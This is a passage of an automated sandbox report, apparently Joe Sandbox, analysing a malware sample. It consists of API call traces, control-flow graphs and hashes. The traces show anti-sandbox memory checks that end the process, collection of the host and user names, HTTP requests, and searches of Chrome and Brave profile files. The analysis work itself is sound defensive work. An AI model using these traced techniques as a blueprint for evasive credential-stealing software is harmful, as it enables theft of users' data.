                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008786A0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                      • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                      • Sleep.KERNEL32(00001770), ref: 00416B04
                                      • CloseHandle.KERNEL32(?,00000000,?,008786A0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                      • ExitProcess.KERNEL32 ref: 00416B22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                      • String ID:
                                      • API String ID: 3511611419-0
                                      • Opcode ID: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                      • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                      • Opcode Fuzzy Hash: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                      • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

                                      Control-flow Graph

                                      APIs
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                      • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??2@$CrackInternetlstrlen
                                      • String ID: <
                                      • API String ID: 1683549937-4251816714
                                      • Opcode ID: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                      • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                      • Opcode Fuzzy Hash: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                      • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1493 401220-401247 call 4189b0 GlobalMemoryStatusEx 1496 401273-40127a 1493->1496 1497 401249-401271 call 41da00 * 2 1493->1497 1499 401281-401285 1496->1499 1497->1499 1501 401287 1499->1501 1502 40129a-40129d 1499->1502 1504 401292-401294 ExitProcess 1501->1504 1505 401289-401290 1501->1505 1505->1502 1505->1504
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                      • __aulldiv.LIBCMT ref: 00401258
                                      • __aulldiv.LIBCMT ref: 00401266
                                      • ExitProcess.KERNEL32 ref: 00401294
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                      • String ID: @
                                      • API String ID: 3404098578-2766056989
                                      • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                      • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                      • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                      • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1507 416af3 1508 416b0a 1507->1508 1510 416aba-416ad7 call 41aad0 OpenEventA 1508->1510 1511 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1508->1511 1516 416af5-416b04 CloseHandle Sleep 1510->1516 1517 416ad9-416af1 call 41aad0 CreateEventA 1510->1517 1516->1508 1517->1511
                                      APIs
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008786A0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                      • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                      • Sleep.KERNEL32(00001770), ref: 00416B04
                                      • CloseHandle.KERNEL32(?,00000000,?,008786A0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                      • ExitProcess.KERNEL32 ref: 00416B22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                      • String ID:
                                      • API String ID: 941982115-0
                                      • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                      • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                      • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                      • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                        • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,00882630), ref: 00406303
                                        • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                        • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,00881E28,00000000,00000000,00400100,00000000), ref: 00406385
                                        • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                        • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                      • String ID: ERROR$ERROR
                                      • API String ID: 3287882509-2579291623
                                      • Opcode ID: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                      • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                      • Opcode Fuzzy Hash: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                      • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                      • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocComputerNameProcess
                                      • String ID:
                                      • API String ID: 4203777966-0
                                      • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                      • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                      • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                      • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                      • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                      • ExitProcess.KERNEL32 ref: 00401143
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AllocCurrentExitNumaVirtual
                                      • String ID:
                                      • API String ID: 1103761159-0
                                      • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                      • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                      • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                      • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007F18BC
                                      • Module32First.KERNEL32(00000000,00000224), ref: 007F18DC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898042742.00000000007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7f0000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 3833638111-0
                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                      • Instruction ID: beab58f8ffd57c9ecbc456aa3d6885c4a2956759e4f91814f39ceecec9a12217
                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                      • Instruction Fuzzy Hash: 4AF0C231100319ABE7203AF9998CABE72E8AF59775F500128E746925C0DA78EC054761
                                      APIs
                                      • SetErrorMode.KERNEL32(00000400,?,?,02300223,?,?), ref: 02300E19
                                      • SetErrorMode.KERNEL32(00000000,?,?,02300223,?,?), ref: 02300E1E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                      • Instruction ID: 834bfec238e9a65a1cf45a95de28566e7cf1e366da0b19ee1e3b597b2ccced10
                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                      • Instruction Fuzzy Hash: 67D0123114512877D7002A94DC09BCD7B1CDF05B66F008011FB0DE9080C770954046E5
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFree
                                      • String ID:
                                      • API String ID: 2087232378-0
                                      • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                      • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                      • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                      • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                      APIs
                                        • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                        • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                        • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                        • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                        • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                        • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                      • ExitProcess.KERNEL32 ref: 004011C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$Process$AllocName$ComputerExitUser
                                      • String ID:
                                      • API String ID: 1004333139-0
                                      • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                      • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                      • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                      • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 007F15A4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898042742.00000000007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7f0000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                      • Instruction ID: 4f295318b131d6e19c46a8470bd501c4aec0f0b6d0c20dd9d78122e7ff40de4d
                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                      • Instruction Fuzzy Hash: B4113C79A00208EFDB01DF98C989E98BFF5AF08750F158094FA489B362D775EA50DF80
                                      APIs
                                      • wsprintfA.USER32 ref: 004138CC
                                      • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                      • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                      • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                      • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                      • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                      • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                      • API String ID: 1125553467-817767981
                                      • Opcode ID: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                      • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                      • Opcode Fuzzy Hash: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                      • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                                      • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                                      • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                                      • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                      • API String ID: 3334442632-726946144
                                      • Opcode ID: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                      • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                                      • Opcode Fuzzy Hash: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                      • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                                      APIs
                                      • wsprintfA.USER32 ref: 0041492C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                      • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                      • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                      • FindClose.KERNEL32(000000FF), ref: 00414B92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s$%s\%s$%s\*
                                      • API String ID: 180737720-445461498
                                      • Opcode ID: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                      • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                      • Opcode Fuzzy Hash: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                      • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                      APIs
                                      • wsprintfA.USER32 ref: 02313B33
                                      • FindFirstFileA.KERNEL32(?,?), ref: 02313B4A
                                      • lstrcat.KERNEL32(?,?), ref: 02313B9C
                                      • StrCmpCA.SHLWAPI(?,00420F70), ref: 02313BAE
                                      • StrCmpCA.SHLWAPI(?,00420F74), ref: 02313BC4
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 02313ECE
                                      • FindClose.KERNEL32(000000FF), ref: 02313EE3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                      • String ID:
                                      • API String ID: 1125553467-0
                                      • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                      • Instruction ID: ea852241361964fc361492abfe5225a8c2d7d6889404f24635065da33cca8d63
                                      • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                      • Instruction Fuzzy Hash: DBA150B6A40218ABDB34DFA4DC84FEE737AFB49700F0445C9A50D96180EB759B84CF62
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                      • HeapAlloc.KERNEL32(00000000), ref: 00414587
                                      • wsprintfA.USER32 ref: 004145A6
                                      • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                      • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                      • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                      • FindClose.KERNEL32(000000FF), ref: 004146A0
                                      • lstrcatA.KERNEL32(?,00882620,?,00000104), ref: 004146C5
                                      • lstrcatA.KERNEL32(?,00880EC0), ref: 004146D8
                                      • lstrlenA.KERNEL32(?), ref: 004146E5
